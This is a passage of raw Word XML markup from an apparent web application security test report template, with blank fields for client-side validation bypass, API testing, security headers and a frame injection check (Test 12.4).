            <w:r w:rsidR="00BF670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54DF2F6" w14:textId="77777777" w:rsidR="00BF670E" w:rsidRDefault="00BF670E" w:rsidP="00CF60D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339D6CD" w14:textId="2B5741E4" w:rsidR="00BF670E" w:rsidRPr="005903CA" w:rsidRDefault="00BF670E" w:rsidP="00CF60D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CB52D2" w:rsidRPr="00CF60DA" w14:paraId="35A33B44" w14:textId="77777777" w:rsidTr="006A5BC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CD53038" w14:textId="6FCAD29E" w:rsidR="00CB52D2" w:rsidRPr="007013B6" w:rsidRDefault="00B55603" w:rsidP="006A5BC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55603">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Disabled Elements Successfully Manipulated?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9A7CE53" w14:textId="6A4B835D" w:rsidR="00CB52D2" w:rsidRDefault="00B55603" w:rsidP="00CF60D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B5560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Example Elements and Outcomes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</w:tc>
      </w:tr>
      <w:tr w:rsidR="00B55603" w:rsidRPr="00CF60DA" w14:paraId="7D1F7B50" w14:textId="77777777" w:rsidTr="006A5BC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1D0F8FC" w14:textId="5DD86026" w:rsidR="00B55603" w:rsidRPr="00B55603" w:rsidRDefault="00B55603" w:rsidP="006A5BC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55603">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>JavaScript-Based Validation Weaknesses Found?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D3CDF06" w14:textId="77777777" w:rsidR="00B55603" w:rsidRDefault="009A5E0C" w:rsidP="00CF60D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9A5E0C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Methods Used: Disabling JS, Script Injection, Flow Manipulation,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760B36A" w14:textId="77777777" w:rsidR="009A5E0C" w:rsidRDefault="009A5E0C" w:rsidP="00CF60D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8ECBD1B" w14:textId="3A71A9EA" w:rsidR="009A5E0C" w:rsidRDefault="009A5E0C" w:rsidP="00CF60D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130CD" w:rsidRPr="00CF60DA" w14:paraId="5AF1D850" w14:textId="77777777" w:rsidTr="006A5BC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7BFCAF01" w14:textId="2F004D0E" w:rsidR="002130CD" w:rsidRPr="00B55603" w:rsidRDefault="002130CD" w:rsidP="006A5BC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130CD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Direct API Testing Results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4458B2F" w14:textId="77777777" w:rsidR="002130CD" w:rsidRDefault="002130CD" w:rsidP="00CF60D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2130C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Client-Side Controls Bypassed? Yes/No, API Response Handling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EB12034" w14:textId="77777777" w:rsidR="002130CD" w:rsidRDefault="002130CD" w:rsidP="00CF60D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7D2BEE3" w14:textId="33C189EA" w:rsidR="002130CD" w:rsidRDefault="002130CD" w:rsidP="00CF60D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A76E4" w:rsidRPr="00CF60DA" w14:paraId="303325E0" w14:textId="77777777" w:rsidTr="006A5BC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09EC4777" w14:textId="64687051" w:rsidR="005A76E4" w:rsidRPr="002130CD" w:rsidRDefault="005A76E4" w:rsidP="006A5BC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A76E4">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Security Headers Implemented?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010DE7F" w14:textId="77777777" w:rsidR="005A76E4" w:rsidRDefault="005A76E4" w:rsidP="00CF60D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5A76E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CSP, X-Content-Type-Options,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9EE92E7" w14:textId="77777777" w:rsidR="005A76E4" w:rsidRDefault="005A76E4" w:rsidP="00CF60D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87E4BEA" w14:textId="4B9E19AB" w:rsidR="005A76E4" w:rsidRDefault="005A76E4" w:rsidP="00CF60D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206B3E" w:rsidRPr="00CF60DA" w14:paraId="20044E38" w14:textId="77777777" w:rsidTr="006A5BC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216A4D32" w14:textId="52E71AC8" w:rsidR="00206B3E" w:rsidRPr="005A76E4" w:rsidRDefault="00206B3E" w:rsidP="006A5BC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206B3E">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Improper Error Handling Detected?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5BED933" w14:textId="77777777" w:rsidR="00206B3E" w:rsidRDefault="00206B3E" w:rsidP="00CF60D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252381" w:rsidRPr="0025238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Details on Data Leakage, Validation Gaps, etc.</w:t>
            </w:r>
            <w:r w:rsidR="0025238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612B699" w14:textId="77777777" w:rsidR="00252381" w:rsidRDefault="00252381" w:rsidP="00CF60D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6204BB0" w14:textId="4DFB8E7C" w:rsidR="00252381" w:rsidRDefault="00252381" w:rsidP="00CF60D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CF60DA" w:rsidRPr="00CF60DA" w14:paraId="091A1D56" w14:textId="77777777" w:rsidTr="006A5BC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5D0CF166" w14:textId="092614AF" w:rsidR="00CF60DA" w:rsidRPr="00CF60DA" w:rsidRDefault="00450DF7" w:rsidP="006A5BC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="00CF60DA" w:rsidRPr="00CF60DA">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Vulnerabilities</w:t>
            </w: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 Identified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495CEB0" w14:textId="77777777" w:rsidR="00CF60DA" w:rsidRPr="00CF60DA" w:rsidRDefault="00CF60DA" w:rsidP="00CF60DA">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="212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22720B7" w14:textId="77777777" w:rsidR="00CF60DA" w:rsidRPr="00CF60DA" w:rsidRDefault="00CF60DA" w:rsidP="00CF60DA">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="21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21EB9BE" w14:textId="77777777" w:rsidR="00CF60DA" w:rsidRPr="00CF60DA" w:rsidRDefault="00CF60DA" w:rsidP="00CF60DA">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="21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FC85668" w14:textId="77777777" w:rsidR="00CF60DA" w:rsidRPr="00CF60DA" w:rsidRDefault="00CF60DA" w:rsidP="00CF60DA">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="21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3A7D050" w14:textId="77777777" w:rsidR="00CF60DA" w:rsidRPr="00CF60DA" w:rsidRDefault="00CF60DA" w:rsidP="00CF60DA">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="21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7EF79A3" w14:textId="77777777" w:rsidR="00CF60DA" w:rsidRPr="00CF60DA" w:rsidRDefault="00CF60DA" w:rsidP="00CF60D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86C35" w:rsidRPr="00CF60DA" w14:paraId="165480F0" w14:textId="77777777" w:rsidTr="006A5BC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1E7CD216" w14:textId="74AC8BAE" w:rsidR="00C86C35" w:rsidRDefault="00C86C35" w:rsidP="006A5BC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86C35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Exploit Paths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2DDC225" w14:textId="77777777" w:rsidR="00C86C35" w:rsidRPr="00ED33FB" w:rsidRDefault="00C86C35" w:rsidP="00C86C3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ED33F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ED33FB" w:rsidRPr="00ED33F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Form Manipulation, API Abuse, Bypassed Input Restrictions, etc.]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="10F0AC48" w14:textId="77777777" w:rsidR="00ED33FB" w:rsidRDefault="00ED33FB" w:rsidP="00C86C3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5945382" w14:textId="5E4CF82A" w:rsidR="00ED33FB" w:rsidRPr="00CF60DA" w:rsidRDefault="00ED33FB" w:rsidP="00C86C35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F60DA" w:rsidRPr="00CF60DA" w14:paraId="584F2FFD" w14:textId="77777777" w:rsidTr="006A5BC9">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2354" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="49E42BC8" w14:textId="77777777" w:rsidR="00CF60DA" w:rsidRPr="00CF60DA" w:rsidRDefault="00CF60DA" w:rsidP="006A5BC9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F60DA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17072B2" w14:textId="77777777" w:rsidR="00CF60DA" w:rsidRPr="00CF60DA" w:rsidRDefault="00CF60DA" w:rsidP="00EB69E7">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="214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1ECE4BD" w14:textId="77777777" w:rsidR="00CF60DA" w:rsidRPr="00CF60DA" w:rsidRDefault="00CF60DA" w:rsidP="00EB69E7">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="21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8100AD7" w14:textId="77777777" w:rsidR="00CF60DA" w:rsidRPr="00CF60DA" w:rsidRDefault="00CF60DA" w:rsidP="00EB69E7">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="21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A7CAE52" w14:textId="77777777" w:rsidR="00CF60DA" w:rsidRPr="00CF60DA" w:rsidRDefault="00CF60DA" w:rsidP="00EB69E7">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="21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C38864A" w14:textId="77777777" w:rsidR="00CF60DA" w:rsidRPr="00CF60DA" w:rsidRDefault="00CF60DA" w:rsidP="00EB69E7">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="21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F847A28" w14:textId="77777777" w:rsidR="00CF60DA" w:rsidRPr="00CF60DA" w:rsidRDefault="00CF60DA" w:rsidP="00CF60D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22862E26" w14:textId="77777777" w:rsidR="00AA4D56" w:rsidRDefault="00AA4D56" w:rsidP="00AA4D56">
      <w:pPr>
        <w:spacing w:before="120" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D2C80">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Results Analysis: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10A53416" w14:textId="77777777" w:rsidR="00AA4D56" w:rsidRPr="00B07F1E" w:rsidRDefault="00AA4D56" w:rsidP="00AA4D56">
      <w:pPr>
        <w:spacing w:before="120" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:b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A4D56" w:rsidRPr="005D2C80" w14:paraId="5E38C831" w14:textId="77777777" w:rsidTr="005232C4">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2CCBE006" w14:textId="77777777" w:rsidR="00AA4D56" w:rsidRPr="005D2C80" w:rsidRDefault="00AA4D56" w:rsidP="005232C4">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="245E0A37" w14:textId="77777777" w:rsidR="00AA4D56" w:rsidRPr="005D2C80" w:rsidRDefault="00AA4D56" w:rsidP="005232C4">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="46BAB71F" w14:textId="77777777" w:rsidR="00AA4D56" w:rsidRDefault="00AA4D56" w:rsidP="005232C4">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="0410039F" w14:textId="77777777" w:rsidR="00AA4D56" w:rsidRDefault="00AA4D56" w:rsidP="005232C4">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="642B37DB" w14:textId="77777777" w:rsidR="00AA4D56" w:rsidRDefault="00AA4D56" w:rsidP="005232C4">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="690ACBC9" w14:textId="77777777" w:rsidR="00AA4D56" w:rsidRPr="005D2C80" w:rsidRDefault="00AA4D56" w:rsidP="005232C4">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="003A5C3F" w14:textId="77777777" w:rsidR="00B51F55" w:rsidRDefault="00B51F55" w:rsidP="00A621A8">
      <w:pPr>
        <w:spacing w:before="120" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="923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230"/>
      </w:tblGrid>
      <w:tr w:rsidR="00FC4162" w:rsidRPr="00A51A96" w14:paraId="3DEDB631" w14:textId="77777777" w:rsidTr="0044298F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9230" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="6C240C03" w14:textId="42B0D10E" w:rsidR="00FC4162" w:rsidRPr="003C713F" w:rsidRDefault="00FC4162" w:rsidP="005232C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bookmarkStart w:id="14" w:name="_Hlk189481187"/>
            <w:r w:rsidRPr="00462042">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Test 12.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
            <w:r w:rsidRPr="0046204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FC4783" w:rsidRPr="00FC4783">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Check for Frame Injection</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:bookmarkEnd w:id="14"/>
    </w:tbl>
    <w:p w14:paraId="3C707A46" w14:textId="77777777" w:rsidR="002C0E71" w:rsidRPr="0044298F" w:rsidRDefault="002C0E71" w:rsidP="00A621A8">
      <w:pPr>
        <w:spacing w:before="120" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="left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8"/>
        <w:gridCol w:w="3825"/>
        <w:gridCol w:w="2947"/>
      </w:tblGrid>
      <w:tr w:rsidR="000B6909" w:rsidRPr="000B6909" w14:paraId="4717B26A" w14:textId="77777777" w:rsidTr="0044298F">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2588" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="12F7DFE7" w14:textId="77777777" w:rsidR="000B6909" w:rsidRPr="000B6909" w:rsidRDefault="000B6909" w:rsidP="004429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B6909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772" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4A5557D7" w14:textId="77777777" w:rsidR="000B6909" w:rsidRPr="000B6909" w:rsidRDefault="000B6909" w:rsidP="000B690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B6909" w:rsidRPr="000B6909" w14:paraId="0CF98B48" w14:textId="77777777" w:rsidTr="0044298F">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2588" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="73246824" w14:textId="77777777" w:rsidR="000B6909" w:rsidRPr="000B6909" w:rsidRDefault="000B6909" w:rsidP="004429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B6909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772" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="56BC32E6" w14:textId="77777777" w:rsidR="000B6909" w:rsidRPr="000B6909" w:rsidRDefault="000B6909" w:rsidP="000B690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B6909" w:rsidRPr="000B6909" w14:paraId="2AE4F790" w14:textId="77777777" w:rsidTr="0044298F">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2588" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5C6107F2" w14:textId="77777777" w:rsidR="000B6909" w:rsidRPr="000B6909" w:rsidRDefault="000B6909" w:rsidP="004429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B6909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772" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="117AB100" w14:textId="77777777" w:rsidR="000B6909" w:rsidRPr="000B6909" w:rsidRDefault="000B6909" w:rsidP="000B690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0B6909" w:rsidRPr="000B6909" w14:paraId="6FF6AB63" w14:textId="77777777" w:rsidTr="0044298F">
        <w:trPr>
          <w:trHeight w:val="890"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2588" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2CFA0962" w14:textId="77777777" w:rsidR="000B6909" w:rsidRPr="000B6909" w:rsidRDefault="000B6909" w:rsidP="004429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0B690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Support Editing of Frames and Frameset Tags by Host Applications</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3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F46C5AD" w14:textId="77777777" w:rsidR="000B6909" w:rsidRPr="000B6909" w:rsidRDefault="000B6909" w:rsidP="000B6909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B6909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29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91A45DB" w14:textId="77777777" w:rsidR="000B6909" w:rsidRPr="000B6909" w:rsidRDefault="000B6909" w:rsidP="000B6909">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1"/>
              </w:numPr>
              <w:spacing w:before="60" w:after="60" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="612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B6909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0B6909" w:rsidRPr="000B6909" w14:paraId="6C985B6F" w14:textId="77777777" w:rsidTr="0044298F">
        <w:trPr>
          <w:trHeight w:val="1043"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2588" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6519E415" w14:textId="77777777" w:rsidR="000B6909" w:rsidRPr="000B6909" w:rsidRDefault="000B6909" w:rsidP="004429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0B690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Vulnerable Host Site Tampered with URL Parameters</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6772" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2D4FE1DB" w14:textId="77777777" w:rsidR="000B6909" w:rsidRPr="000B6909" w:rsidRDefault="000B6909" w:rsidP="000B6909">
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="612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0B6909" w:rsidRPr="000B6909" w14:paraId="7A2116DA" w14:textId="77777777" w:rsidTr="0044298F">
        <w:trPr>
          <w:trHeight w:val="1043"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2588" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5E177306" w14:textId="77777777" w:rsidR="000B6909" w:rsidRPr="000B6909" w:rsidRDefault="000B6909" w:rsidP="004429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0B690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Forged Site that Controls Contents of the Host Site</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6772" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="44A49CD3" w14:textId="77777777" w:rsidR="000B6909" w:rsidRPr="000B6909" w:rsidRDefault="000B6909" w:rsidP="000B6909">
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="612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3F3ACD" w:rsidRPr="000B6909" w14:paraId="0CCDA709" w14:textId="77777777" w:rsidTr="0044298F">
        <w:trPr>
          <w:trHeight w:val="1043"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2588" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="42F7E30B" w14:textId="5817E3A7" w:rsidR="003F3ACD" w:rsidRPr="000B6909" w:rsidRDefault="003F3ACD" w:rsidP="004429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5C2758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Presence of X-Frame-Options Header?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6772" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="27856991" w14:textId="77777777" w:rsidR="003F3ACD" w:rsidRDefault="003F3ACD" w:rsidP="003F3ACD">
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left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 w:rsidRPr="00E26CF2"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[*Yes/No, Value: DENY/SAMEORIGIN/ALLOW-FROM]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="442FA8BB" w14:textId="77777777" w:rsidR="003F3ACD" w:rsidRDefault="003F3ACD" w:rsidP="003F3ACD">
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left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3ACE061F" w14:textId="77777777" w:rsidR="003F3ACD" w:rsidRPr="000B6909" w:rsidRDefault="003F3ACD" w:rsidP="003F3ACD">
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="612"/>
              <w:jc w:val="left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826C88" w:rsidRPr="000B6909" w14:paraId="4CBC7853" w14:textId="77777777" w:rsidTr="0044298F">
        <w:trPr>
          <w:trHeight w:val="1043"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2588" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0EBCF226" w14:textId="2090BFD4" w:rsidR="00826C88" w:rsidRPr="005C2758" w:rsidRDefault="00826C88" w:rsidP="004429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826C88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Content Security Policy (CSP) with frame-ancestors?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6772" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="634FA010" w14:textId="77777777" w:rsidR="00826C88" w:rsidRDefault="00826C88" w:rsidP="003F3ACD">
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left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Pr="00826C88">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:iCs/>
                <w:kern w:val="0"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Yes/No, Details if found</w:t>
            </w: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55A89B99" w14:textId="77777777" w:rsidR="00826C88" w:rsidRDefault="00826C88" w:rsidP="003F3ACD">
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left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01A25C52" w14:textId="2B3BDD5A" w:rsidR="00826C88" w:rsidRPr="00E26CF2" w:rsidRDefault="00826C88" w:rsidP="003F3ACD">
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left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C91425" w:rsidRPr="000B6909" w14:paraId="0E48A3B5" w14:textId="77777777" w:rsidTr="0044298F">
        <w:trPr>
          <w:trHeight w:val="1043"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2588" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3300700D" w14:textId="2D477022" w:rsidR="00C91425" w:rsidRPr="00826C88" w:rsidRDefault="00C91425" w:rsidP="004429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C91425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Successful iframe Injection?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6772" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4AD57067" w14:textId="77777777" w:rsidR="00C91425" w:rsidRDefault="00C91425" w:rsidP="003F3ACD">
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left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Pr="00C91425">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:iCs/>
                <w:kern w:val="0"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Yes/No, If successful, URL of injected iframe</w:t>
            </w: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0DDF7A7C" w14:textId="77777777" w:rsidR="00C91425" w:rsidRDefault="00C91425" w:rsidP="003F3ACD">
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left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32D7724C" w14:textId="58C4B821" w:rsidR="00C91425" w:rsidRDefault="00C91425" w:rsidP="003F3ACD">
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left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404FE0" w:rsidRPr="000B6909" w14:paraId="207CC760" w14:textId="77777777" w:rsidTr="0044298F">
        <w:trPr>
          <w:trHeight w:val="1043"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2588" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="02C8AD3E" w14:textId="2400E8FD" w:rsidR="00404FE0" w:rsidRPr="00C91425" w:rsidRDefault="00404FE0" w:rsidP="004429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404FE0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Frame Injection via User-Submitted Content?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6772" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="45AE7586" w14:textId="77777777" w:rsidR="00404FE0" w:rsidRDefault="00404FE0" w:rsidP="003F3ACD">
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left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Pr="00404FE0">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:iCs/>
                <w:kern w:val="0"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Yes/No, Details if found, Input Sanitization Status</w:t>
            </w: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28360270" w14:textId="77777777" w:rsidR="00404FE0" w:rsidRDefault="00404FE0" w:rsidP="003F3ACD">
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left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67AADA12" w14:textId="6161602A" w:rsidR="00404FE0" w:rsidRDefault="00404FE0" w:rsidP="003F3ACD">
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left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A312B9" w:rsidRPr="000B6909" w14:paraId="4557292F" w14:textId="77777777" w:rsidTr="0044298F">
        <w:trPr>
          <w:trHeight w:val="1043"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2588" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4ECBFD78" w14:textId="711B558D" w:rsidR="00A312B9" w:rsidRPr="00404FE0" w:rsidRDefault="00A312B9" w:rsidP="004429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A312B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Legacy Application Vulnerability Detected?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6772" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3CECA719" w14:textId="77777777" w:rsidR="00A312B9" w:rsidRDefault="00A312B9" w:rsidP="003F3ACD">
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left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Pr="00A312B9">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:iCs/>
